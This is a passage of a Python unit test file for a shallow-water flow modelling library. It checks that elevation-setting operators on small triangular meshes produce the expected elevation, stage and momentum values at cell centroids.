stage_ex = [ 3.66666667, 3.33333333, 2.33333333, 3.66666667]
elev_ex = [ 2.66666667, 2.33333333, 1.33333333, 2.66666667]
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_simple_de0(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
stage_c = domain.quantities['stage'].centroid_values
elev_c = domain.quantities['elevation'].centroid_values
height_c = stage_c - elev_c
integral0 = num.sum(height_c)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# pprint( domain.quantities['stage'].centroid_values )
# pprint( domain.quantities['xmomentum'].centroid_values )
# pprint( domain.quantities['ymomentum'].centroid_values )
# Apply operator to these triangles
indices = [0,1,3]
elev = 3.0
operator = Set_elevation_operator(domain, elevation=elev, indices=indices)
# Apply Operator
domain.timestep = 2.0
operator()
height_c = stage_c - elev_c
integral1 = num.sum(height_c)
assert integral0 == integral1
stage_ex = [ 4., 4., 1., 4.]
elev_ex = [ 3., 3., 0., 3.]
#pprint( domain.quantities['elevation'].centroid_values )
#pprint( domain.quantities['stage'].centroid_values )
#pprint( domain.quantities['xmomentum'].centroid_values )
#pprint( domain.quantities['ymomentum'].centroid_values )
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_negative_1_5(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
domain.set_flow_algorithm('1_5')
#Flat surface with 1m of water
domain.set_quantity('elevation', lambda x,y : -2*x)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
stage_c = domain.quantities['stage'].centroid_values
elev_c = domain.quantities['elevation'].centroid_values
height_c = stage_c - elev_c
integral0 = num.sum(height_c)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
#Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
#rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
elev = -5.0
operator = Set_elevation_operator(domain, elevation=elev, indices=indices)
# Apply Operator
domain.timestep = 2.0
operator()
height_c = stage_c - elev_c
integral1 = num.sum(height_c)
assert integral0 == integral1
elev_ex = [-4.88888889, -4.77777778, -5.77777778, -4.88888889]
stage_ex = [-2.55555556, -1.11111111, 0.55555556, -2.55555556]
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_negative_de0(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', lambda x,y : -2*x)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
stage_c = domain.quantities['stage'].centroid_values
elev_c = domain.quantities['elevation'].centroid_values
height_c = stage_c - elev_c
integral0 = num.sum(height_c)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
#Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
#rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
elev = -5.0
operator = Set_elevation_operator(domain, elevation=elev, indices=indices)
# Apply Operator
domain.timestep = 2.0
operator()
height_c = stage_c - elev_c
integral1 = num.sum(height_c)
assert integral0 == integral1
elev_ex = [-5. , -5. , -5.33333333, -5. ]
stage_ex = [-2.66666667, -1.33333333, 1. , -2.66666667]
# pprint( domain.quantities['elevation'].centroid_values )
# pprint( domain.quantities['stage'].centroid_values )
# pprint( domain.quantities['xmomentum'].centroid_values )
# pprint( domain.quantities['ymomentum'].centroid_values )
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_small_function_1_5(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
domain.set_flow_algorithm('1_5')
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
def elev(t):
if t < 10.0:
return 5.0
else:
return 7.0
operator = Set_elevation_operator(domain, elevation=elev, indices=indices)
# Apply Operator at time t=1.0
domain.set_time(1.0)
operator()
elev_ex = [ 4.44444444, 3.88888889, 2.22222222, 4.44444444]
stage_ex = [ 5.44444444, 4.88888889, 3.22222222, 5.44444444]
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# Apply Operator at time t=15.0
domain.set_time(15.0)
operator()
elev_ex = [ 6.59259259, 6.18518519, 3.85185185, 6.59259259]
stage_ex = [ 7.59259259, 7.18518519, 4.85185185, 7.59259259]
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_small_function_de0(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
def elev(t):
if t < 10.0:
return 5.0
else:
return 7.0
operator = Set_elevation_operator(domain, elevation=elev, indices=indices)
# Apply Operator at time t=1.0
domain.set_time(1.0)
operator()
elev_ex = [ 5., 5., 0., 5.]
stage_ex = [ 6., 6., 1., 6.]
#pprint( domain.quantities['elevation'].centroid_values)
#pprint( domain.quantities['stage'].centroid_values)
#pprint( domain.quantities['xmomentum'].centroid_values)
#pprint( domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# Apply Operator at time t=15.0
domain.set_time(15.0)
operator()
elev_ex = [ 7., 7., 0., 7.]
stage_ex = [ 8., 8., 1., 8.]
#pprint( domain.quantities['elevation'].centroid_values )
#pprint( domain.quantities['stage'].centroid_values )
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_polygonal_elevation_operator_large_function(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
length = 2.0
width = 2.0
dx = dy = 0.5
domain = rectangular_cross_domain(int(old_div(length,dx)), int(old_div(width,dy)),
len1=length, len2=width)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
R = Reflective_boundary(domain)
domain.set_boundary( {'left': R, 'right': R, 'bottom': R, 'top': R} )
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
def elev(t):
if t < 10.0:
return 5.0
else:
return 7.0
polygon = [(0.5,0.5), (1.5,0.5), (1.5,1.5), (0.5,1.5)]
operator = Polygonal_set_elevation_operator(domain, elevation=elev, polygon=polygon)
# Apply Operator at time t=1.0
domain.set_time(1.0)
operator()
elev_ex = [ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 5., 5., 5., 5., 5., 5.,
5., 5., 0., 0., 0., 0., 0., 0., 0., 0., 5., 5., 5.,
5., 5., 5., 5., 5., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
stage_ex = [ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 6., 6., 6., 6., 6., 6.,
6., 6., 1., 1., 1., 1., 1., 1., 1., 1., 6., 6., 6.,
6., 6., 6., 6., 6., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# Apply Operator at time t=15.0
domain.set_time(15.0)
operator()
elev_ex = [ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 7., 7., 7., 7., 7., 7.,
7., 7., 0., 0., 0., 0., 0., 0., 0., 0., 7., 7., 7.,
7., 7., 7., 7., 7., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
stage_ex = [ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 8., 8., 8., 8., 8., 8.,
8., 8., 1., 1., 1., 1., 1., 1., 1., 1., 8., 8., 8.,
8., 8., 8., 8., 8., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_large_function(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
length = 2.0
width = 2.0
dx = dy = 0.5
domain = rectangular_cross_domain(int(old_div(length,dx)), int(old_div(width,dy)),
len1=length, len2=width)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
R = Reflective_boundary(domain)
domain.set_boundary( {'left': R, 'right': R, 'bottom': R, 'top': R} )
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
def elev(t):
if t < 10.0:
return 5.0
else:
return 7.0
polygon = [(0.5,0.5), (1.5,0.5), (1.5,1.5), (0.5,1.5)]
operator = Set_elevation_operator(domain, elevation=elev, polygon=polygon)
# Apply Operator at time t=1.0
domain.set_time(1.0)
operator()
stage_ex = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
elev_ex = [ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 5., 5., 5., 5., 5., 5.,
5., 5., 0., 0., 0., 0., 0., 0., 0., 0., 5., 5., 5.,
5., 5., 5., 5., 5., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
stage_ex = [ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 6., 6., 6., 6., 6., 6.,
6., 6., 1., 1., 1., 1., 1., 1., 1., 1., 6., 6., 6.,
6., 6., 6., 6., 6., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# Apply Operator at time t=15.0
domain.set_time(15.0)
operator()
stage_ex = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]
elev_ex = [ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 7., 7., 7., 7., 7., 7.,
7., 7., 0., 0., 0., 0., 0., 0., 0., 0., 7., 7., 7.,
7., 7., 7., 7., 7., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.]
stage_ex = [ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 8., 8., 8., 8., 8., 8.,
8., 8., 1., 1., 1., 1., 1., 1., 1., 1., 8., 8., 8.,
8., 8., 8., 8., 8., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.]
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_circular_elevation_operator_large_function(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
length = 2.0
width = 2.0
dx = dy = 0.5
domain = rectangular_cross_domain(int(old_div(length,dx)), int(old_div(width,dy)),
len1=length, len2=width)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
R = Reflective_boundary(domain)
domain.set_boundary( {'left': R, 'right': R, 'bottom': R, 'top': R} )
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
def elev(t):
if t < 10.0:
return 5.0
else:
return 7.0
operator = Circular_set_elevation_operator(domain, elevation=elev, center=[1.0,1.0], radius=1.0)
# Apply Operator at time t=1.0
domain.set_time(1.0)
operator()
elev_ex = [ 0., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0.,
5., 5., 0., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 5.,
5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0., 5.,
5., 5., 5., 5., 5., 5., 5., 5., 5., 5., 0., 0.]
stage_ex = [ 1., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1.,
6., 6., 1., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 6.,
6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1., 6.,
6., 6., 6., 6., 6., 6., 6., 6., 6., 6., 1., 1.]
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# Apply Operator at time t=15.0
domain.set_time(15.0)
operator()
elev_ex = [ 0., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0.,
7., 7., 0., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 7.,
7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0., 7.,
7., 7., 7., 7., 7., 7., 7., 7., 7., 7., 0., 0.]
stage_ex = [ 1., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1.,
8., 8., 1., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 8.,
8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1., 8.,
8., 8., 8., 8., 8., 8., 8., 8., 8., 8., 1., 1.]
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# pprint (domain.quantities['xmomentum'].centroid_values)
# pprint (domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_center_radius_1_5(self):
from math import pi, cos, sin
length = 2.0
width = 2.0
dx = dy = 0.5
domain = rectangular_cross_domain(int(old_div(length,dx)), int(old_div(width,dy)),
len1=length, len2=width)
domain.set_flow_algorithm('1_5')
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
R = Reflective_boundary(domain)
domain.set_boundary( {'left': R, 'right': R, 'bottom': R, 'top': R} )
from pprint import pprint
#pprint(domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
def elev(t):
if t < 10.0:
return 5.0
else:
return 7.0
operator = Set_elevation_operator(domain, elevation=elev, center=[1.0,1.0], radius=1.0)
# Apply Operator at time t=1.0
domain.set_time(1.0)
operator()
#pprint(domain.quantities['elevation'].centroid_values)
elev_ex = [ 2.08333333, 2.08333333, 3.75 , 3.75 , 4.58333333,
4.58333333, 5. , 5. , 4.58333333, 5. ,
5. , 4.58333333, 2.08333333, 3.75 , 3.75 ,
2.08333333, 4.58333333, 4.58333333, 5. , 5. ,
5. , 5. , 5. , 5. , 5. ,
5. , 5. , 5. , 4.58333333, 5. ,
5. , 4.58333333, 5. , 4.58333333, 4.58333333,
5. , 5. , 5. , 5. , 5. ,
5. , 5. , 5. , 5. , 5. ,
5. , 4.58333333, 4.58333333, 3.75 , 2.08333333,
2.08333333, 3.75 , 5. , 4.58333333, 4.58333333,
5. , 5. , 5. , 4.58333333, 4.58333333,
3.75 , 3.75 , 2.08333333, 2.08333333]
#pprint(domain.quantities['stage'].centroid_values)
stage_ex = [ 3.08333333, 3.08333333, 4.75 , 4.75 , 5.58333333,
5.58333333, 6. , 6. , 5.58333333, 6. ,
6. , 5.58333333, 3.08333333, 4.75 , 4.75 ,
3.08333333, 5.58333333, 5.58333333, 6. , 6. ,
6. , 6. , 6. , 6. , 6. ,
6. , 6. , 6. , 5.58333333, 6. ,
6. , 5.58333333, 6. , 5.58333333, 5.58333333,
6. , 6. , 6. , 6. , 6. ,
6. , 6. , 6. , 6. , 6. ,
6. , 5.58333333, 5.58333333, 4.75 , 3.08333333,
3.08333333, 4.75 , 6. , 5.58333333, 5.58333333,
6. , 6. , 6. , 5.58333333, 5.58333333,
4.75 , 4.75 , 3.08333333, 3.08333333]
# from pprint import pprint
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# Apply Operator at time t=15.0
domain.set_time(15.0)
operator()
elev_ex = [ 3.64583333, 3.64583333, 5.97916667, 5.97916667, 6.72916667,
6.72916667, 7. , 7. , 6.72916667, 7. ,
7. , 6.72916667, 3.64583333, 5.97916667, 5.97916667,
3.64583333, 6.72916667, 6.72916667, 7. , 7. ,
7. , 7. , 7. , 7. , 7. ,
7. , 7. , 7. , 6.72916667, 7. ,
7. , 6.72916667, 7. , 6.72916667, 6.72916667,
7. , 7. , 7. , 7. , 7. ,
7. , 7. , 7. , 7. , 7. ,
7. , 6.72916667, 6.72916667, 5.97916667, 3.64583333,
3.64583333, 5.97916667, 7. , 6.72916667, 6.72916667,
7. , 7. , 7. , 6.72916667, 6.72916667,
5.97916667, 5.97916667, 3.64583333, 3.64583333]
stage_ex = [ 4.64583333, 4.64583333, 6.97916667, 6.97916667, 7.72916667,
7.72916667, 8. , 8. , 7.72916667, 8. ,
8. , 7.72916667, 4.64583333, 6.97916667, 6.97916667,
4.64583333, 7.72916667, 7.72916667, 8. , 8. ,
8. , 8. , 8. , 8. , 8. ,
8. , 8. , 8. , 7.72916667, 8. ,
8. , 7.72916667, 8. , 7.72916667, 7.72916667,
8. , 8. , 8. , 8. , 8. ,
8. , 8. , 8. , 8. , 8. ,
8. , 7.72916667, 7.72916667, 6.97916667, 4.64583333,
4.64583333, 6.97916667, 8. , 7.72916667, 7.72916667,
8. , 8. , 8. , 7.72916667, 7.72916667,
6.97916667, 6.97916667, 4.64583333, 4.64583333]
# from pprint import pprint
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# pprint (domain.quantities['xmomentum'].centroid_values)
# pprint (domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
operator = Set_elevation(domain, elevation=0.0)
#print operator.value_type
operator()
#from pprint import pprint
#pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# pprint (domain.quantities['xmomentum'].centroid_values)
# pprint (domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, 0.0)
assert num.allclose(domain.quantities['stage'].centroid_values, 1.0)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
operator = Set_elevation(domain, elevation=lambda t: t, indices = [0,1,3])
operator()
elev_ex = [ 11.25 , 10. , 5.625, 6.875, 2.5 , 3.125, 0.625,
0. , 0. , 0. , 0. , 0. , 0. , 0. ,
0. , 0. , 1.875, 1.25 , 0. , 0.625, 0.625,
0.625, 0. , 0. , 0. , 0. , 0. , 0. ,
0. , 0. , 0. , 0. , 0. , 0. , 0. ,
0. , 0. , 0. , 0. , 0. , 0. , 0. ,
0. , 0. , 0. , 0. , 0. , 0. , 0. ,
0. , 0. , 0. , 0. , 0. , 0. , 0. ,
0. , 0. , 0. , 0. , 0. , 0. , 0. , 0. ]
stage_ex = [ 12.25 , 11. , 6.625, 7.875, 3.5 , 4.125, 1.625,
1. , 1. , 1. , 1. , 1. , 1. , 1. ,
1. , 1. , 2.875, 2.25 , 1. , 1.625, 1.625,
1.625, 1. , 1. , 1. , 1. , 1. , 1. ,
1. , 1. , 1. , 1. , 1. , 1. , 1. ,
1. , 1. , 1. , 1. , 1. , 1. , 1. ,
1. , 1. , 1. , 1. , 1. , 1. , 1. ,
1. , 1. , 1. , 1. , 1. , 1. , 1. ,
1. , 1. , 1. , 1. , 1. , 1. , 1. , 1. ]
# from pprint import pprint
# pprint (domain.quantities['elevation'].centroid_values)
# pprint (domain.quantities['stage'].centroid_values)
# pprint (domain.quantities['xmomentum'].centroid_values)
# pprint (domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['elevation'].centroid_values, elev_ex)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
def test_set_elevation_operator_center_radius_de1(self):
from math import pi, cos, sin
length = 2.0
width = 2.0
dx = dy = 0.5
domain = rectangular_cross_domain(int(old_div(length,dx)), int(old_div(width,dy)),
len1=length, len2=width)
#Flat surface with 1m of water
domain.set_flow_algorithm('DE1')
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
